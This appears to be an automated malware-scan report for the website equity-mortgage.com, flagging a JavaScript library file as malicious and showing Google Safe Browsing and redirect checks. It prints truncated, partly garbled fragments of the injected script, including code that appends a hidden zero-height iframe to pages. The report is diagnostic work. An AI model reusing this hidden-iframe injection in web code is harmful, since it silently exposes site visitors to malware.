Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=equity-mortgage.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://equity-mortgage.com/ | 200 OK Content-Length: 9267 Content-Type: text/html | clean |
http://equity-mortgage.com/GeneratedItems/CSScriptLib.js | 200 OK Content-Length: 9596 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) CSInit = new Array; CSExit = new Array; CSStopExecution=false; function CSAction(array) {return CSAction2(CSAct, array);} function CSAction2(fct, array) { var result; for (var i=0;i<array.length;i++) { if(CSStopExecution) return false; var aa = fct[array[i]]; if (aa == null) return false; var ta = new Array; for(var j=1;j<aa.length;j++) { if((aa[j]!=null)&&(typeof(aa[j])=="object")&&(aa[j].length==2)){ if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://equity-mortgage.com/../GeneratedItems/CSScriptLib.js | 400 Bad Request Content-Length: 1024 Content-Type: text/html | clean |
http://equity-mortgage.com/test404page.js | 404 Not Found Content-Length: 963 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: equity-mortgage.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 17:08:04 GMT
Accept-Ranges: bytes
Server: Apache
Content-Type: text/html
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: equity-mortgage.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 17:08:04 GMT
Accept-Ranges: bytes
Server: Apache
Content-Type: text/html
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: equity-mortgage.com
Referer: http://www.google.com/search?q=equity-mortgage.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: equity-mortgage.com
Referer: http://www.google.com/search?q=equity-mortgage.com
Result:
The result is similar to the first query. There are no suspicious redirects found.